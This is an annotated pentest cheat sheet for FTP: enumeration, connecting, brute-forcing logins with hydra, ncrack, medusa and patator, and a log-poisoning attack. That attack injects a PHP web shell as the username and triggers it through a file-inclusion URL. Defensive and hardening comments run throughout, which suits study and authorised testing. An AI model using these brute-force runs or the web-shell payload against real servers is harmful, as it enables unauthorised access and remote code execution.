21 - FTP
Information
Default Port: 21
PORT STATE SERVICE
21/tcp open ftp
Enumeration
# Banner grab: the 220 greeting normally identifies the FTP server software and version.
nc -vn 192.168.1.2 21
# Same grab wrapped in timeout, so the connection is cut after 0.1 s instead of staying open.
timeout 0.1 bash -c "nc -nv 192.168.1.2 21"
nmap -p21 -sS 192.168.1.2 # TCP SYN scan of port 21 only
nmap -p21 -sVC 192.168.1.2 # version detection (-sV) plus the default script set (-sC)
nmap -p21 --script "ftp-anon" 192.168.1.2 # reports whether anonymous login is accepted
# NOTE: the ftp-* wildcard also selects intrusive scripts such as ftp-brute, so this run
# generates login attempts and log entries on the server; confirm that is in scope.
nmap -p21 --script "ftp-*" 192.168.1.2
# ftps
# Without -starttls the TLS handshake starts immediately (implicit FTPS, conventionally port 990).
# With -starttls ftp, openssl first upgrades the plain FTP session (explicit FTPS), the usual mode on port 21.
openssl s_client -connect 192.168.1.2:21
openssl s_client -connect 192.168.1.2:21 -starttls ftp
Connect
# Plain FTP carries the username and password in cleartext on the wire.
# Passwords given on the command line (lftp -u user,pass / ncftp -p) are also visible
# in the local process list and end up in shell history.
ftp 192.168.1.2 # default port
ftp 192.168.1.2 1234 # other port
ftp anonymous@192.168.1.2 # one liner
lftp -u anonymous, 192.168.1.2 # default port; empty password after the comma
lftp -u ftpadmin,pass1234 192.168.1.2
lftp -u ftpadmin,'B0ss_B!TcH' 192.168.1.2 # single quotes stop the shell expanding '!' in the password
lftp -u ftpadmin,pass1234 192.168.1.2 -p 1234 # other port
lftp -u ftpadmin,pass1234 192.168.1.2 # ftps
lftp :~> ls
ls: Fatal error: Certificate verification: Not trusted
# The next setting turns off server certificate validation for the session: traffic is
# still encrypted, but the server's identity is no longer checked, so an on-path host can
# impersonate it and capture the credentials. Trusting the server's CA instead
# (lftp setting ssl:ca-file) keeps the check in place.
lftp :~> set ssl:verify-certificate false
ncftp -u peter -p 'Passw0rd' 192.168.1.2 # default port
ncftp -u peter -p 'Passw0rd' -P 1234 192.168.1.2 # other port
Usage
# Commands typed at the FTP client prompt, not in the shell.
lpwd # local directory
pwd # remote directory
put <FILE> # upload file
mput * # upload all files
get <FILE> # download file
prompt off # turn off the per-file confirmation asked by mget/mput
mget * # download all files
binary # activate binary mode; ASCII mode rewrites line endings and corrupts non-text files
bye # close the session and exit the client
ftp> rename cmd.php # rename file (cmd.php > cmd.php5)
(to-name) cmd.php5
ftp> less .htaccess # read files from FTP
ftp> more .htaccess
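Error (Passive Mode)
The first ls stalls after the 229 reply, typically because the passive data port announced by the server is filtered or unreachable. "passive off" switches the client to active mode (EPRT), in which the server opens the data connection back to the client.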
❯ ftp 192.168.235.56
Connected to 192.168.235.56.
220 (vsFTPd 3.0.3)
Name (192.168.235.56:kali): admin
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||17214|)
ftp> passive off
Passive mode: off; fallback to active mode: off.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x 2 1001 0 4096 May 26 2020 contactform
drwxr-xr-x 2 1001 0 4096 May 26 2020 css
drwxr-xr-x 3 1001 0 4096 May 26 2020 img
-rw-r--r-- 1 1001 0 23364 May 27 2020 index.php
drwxr-xr-x 2 1001 0 4096 May 26 2020 js
drwxr-xr-x 11 1001 0 4096 May 26 2020 lib
226 Directory send OK.
Brute Force
FTP
# Online password guessing against the FTP login. Flags used below:
#   hydra:   -l single login, -P password list, -C file of login:password pairs,
#            -t parallel tasks, -f stop at the first valid pair, -I ignore an old restore file
#   ncrack:  --user login, -P password list, -f quit after the first credential found, -v verbose
#   medusa:  -h host, -u login, -P password list, -M module, -t concurrent logins,
#            -v verbosity level, -f stop at the first valid login
#   patator: FILE0 is filled from the file given as 0=...; -x ignore:code=530 hides failed logins
# Defender view: every failed guess gets a 530 reply and is normally recorded in the server
# log, so bursts of failures from one address are straightforward to alert on. Failed-login
# delays, per-IP connection caps (vsftpd: delay_failed_login, max_login_fails, max_per_ip)
# and automatic banning limit what these tools can achieve.
hydra -t 64 -l ftpuser -P rockyou.txt ftp://192.168.1.2 -f -I
hydra -t 64 -l ftpuser -P rockyou.txt ftp://192.168.1.2:1234 -f -I
hydra -C ftp-betterdefaultpasslist.txt ftp://192.168.1.2
ncrack -v -f --user ftp_s3cr3t -P rockyou.txt ftp://192.168.1.2
ncrack -v -f --user ftp_s3cr3t -P rockyou.txt ftp://192.168.1.2:1234
medusa -h 192.168.1.2 -u peter -P rockyou.txt -M ftp -v 4 -f
medusa -h 192.168.1.2 -u peter -P rockyou.txt -t 10 -M ftp -v 4 -f
medusa -h 192.168.1.2 -u peter -P rockyou.txt -t 10 -M ftp -v 4 -f 2>/dev/null # same run, error output discarded
patator ftp_login host=192.168.1.2 user=admin password=FILE0 0=rockyou.txt -x ignore:code=530
patator ftp_login host=192.168.1.2 port=1234 user=admin password=FILE0 0=rockyou.txt -x ignore:code=530
FTPS
# Same flags as the plain-FTP hydra runs; the ftps:// scheme selects FTP over TLS.
# NOTE(review): presumably explicit TLS on port 21 — confirm against the hydra version in use.
hydra -t 64 -l ftpuser -P rockyou.txt ftps://192.168.1.2 -f -I
Download
# Credentials embedded in the URL travel in cleartext and end up in shell history and the process list.
wget -r ftp://anonymous:none@192.168.1.2 # -r: recursive download
wget -m ftp://anonymous:anonymous@192.168.1.2 # -m: mirror (recursion plus timestamping)
# --no-passive switches to active mode, where the server opens the data connection back
# to the client, so the client must accept inbound connections.
wget -m --no-passive ftp://anonymous:anonymous@192.168.1.2 # [Error PASV]
wget -r --no-passive --no-parent ftp://anonymous:none@192.168.1.2 # [Error PASV]; --no-parent: never ascend above the start directory
Mount
# apt-get install -y curlftpfs
mkdir /mnt/ftp # mount point; creating it under /mnt normally needs root
# The password is passed on the command line, so it is visible in the process list while
# the mount exists and is saved in shell history.
# NOTE(review): curlftpfs can reportedly take credentials from ~/.netrc instead — verify for the installed version.
curlftpfs 192.168.1.2 /mnt/ftp -o user=ftpadmin:'pass123'
umount /mnt/ftp # a mount made by an unprivileged user is released with fusermount -u /mnt/ftp
Files
/etc/vsftpd.conf # config file
/var/log/vsftpd.log # log file
/srv/ftp # default folder
Log Poisoning
# Relies on two weaknesses outside FTP itself: a file-inclusion flaw in the web application
# (the file= parameter in the request on the next line) and a vsftpd log that the web
# server account can read. The string supplied as the FTP username lands in that log.
# Mitigation: restrict the include to an allow-list of files, keep /var/log/vsftpd.log
# unreadable to the web server account, and alert on log lines containing "<?php".
lftp -u '<?php system($_GET["cmd"]); ?>', 192.168.1.2
http://192.168.1.2/file.php?file=/var/log/vsftpd.log&cmd=id